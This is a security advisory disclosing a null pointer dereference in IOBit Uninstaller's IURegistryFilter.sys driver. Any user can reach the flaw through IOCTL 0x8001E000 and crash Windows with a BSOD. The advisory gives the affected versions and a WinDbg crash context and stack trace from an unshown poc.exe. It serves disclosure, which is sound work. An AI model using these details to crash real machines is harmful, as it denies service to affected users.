[IOBit][Uninstaller][IURegistryFilter][0x8001E000][NPD][DOS]

IOBit Uninstaller DOS Vulnerability

Basic Info

Vendor: IOBit

Software：

Name: Uninstaller
Version: 13.6.0.5
Download Page: https://www.iobit.com/en/advanceduninstaller.php

Vulnerable Component:

File: IURegistryFilter.sys
File Version: 1.0.6.20

Vuln Type: Null Pointer Dereference

Description:

IURegistryFilter.sys allows all users in Everyone Group to interact with it. When process IOCTL 0x8001E000, it doesn't check the address of the input buffer, an attacker with low privilege can trigger this vulnerability and cause BSOD in the Windows system.

Proof Of Concept

Test OS Version: Windows 10, 19041.vb_release.191206-1406

click poc.exe to trigger this issue
cause a BSOD of Windows system

CONTEXT:  ffff808cd7675d90 -- (.cxr 0xffff808cd7675d90)
rax=000000008001e014 rbx=0000000000000000 rcx=000000008001e000
rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000
rip=fffff806743a1a23 rsp=ffff808cd7676790 rbp=0000000000000000
 r8=0000000000000000  r9=ffffd702f3449560 r10=fffff806743a1838
r11=0000000000000000 r12=ffffd702f307f2b0 r13=ffffd702f3449560
r14=0000000000000001 r15=0000000000000000
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00050246
IURegistryFilter+0x1a23:
fffff806`743a1a23 837d0001        cmp     dword ptr [rbp],1 ss:0018:00000000`00000000=????????
Resetting default scope

PROCESS_NAME:  poc.exe

STACK_TEXT:
ffff808c`d7676790 fffff806`59a49cf5 : 00000000`00000002 00000000`00000000 ffff808c`d7676b80 00000000`00000000 : IURegistryFilter+0x1a23
ffff808c`d76767f0 fffff806`59e592ac : 00000000`00000001 00000000`8001e000 ffffd702`f644e590 00000000`00000000 : nt!IofCallDriver+0x55
ffff808c`d7676830 fffff806`59e58f03 : ffffd702`00000000 ffff808c`d7676b80 00000000`00010000 00000000`8001e000 : nt!IopSynchronousServiceTail+0x34c
ffff808c`d76768d0 fffff806`59e581d6 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!IopXxxControlFile+0xd13
ffff808c`d7676a20 fffff806`59c25235 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`0014edb8 : nt!NtDeviceIoControlFile+0x56
ffff808c`d7676a90 00007ffa`f510d0c4 : 00007ffa`f2b2591b 00000002`0000000c 00007ffa`f50c0101 00000414`596a1df7 : nt!KiSystemServiceCopyEnd+0x25
00000000`0014fdc8 00007ffa`f2b2591b : 00000002`0000000c 00007ffa`f50c0101 00000414`596a1df7 00007ffa`f2fd5985 : ntdll!NtDeviceIoControlFile+0x14
00000000`0014fdd0 00007ffa`f3295921 : 00000000`8001e000 00000000`00000000 00000000`0014fe60 00007ffa`00000000 : KERNELBASE!DeviceIoControl+0x6b
00000000`0014fe40 00007ff7`484e10fc : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!DeviceIoControlImplementation+0x81
00000000`0014fe90 00007ff7`484e1350 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : poc!main+0x8c

attachment

IURegistryFilter.sys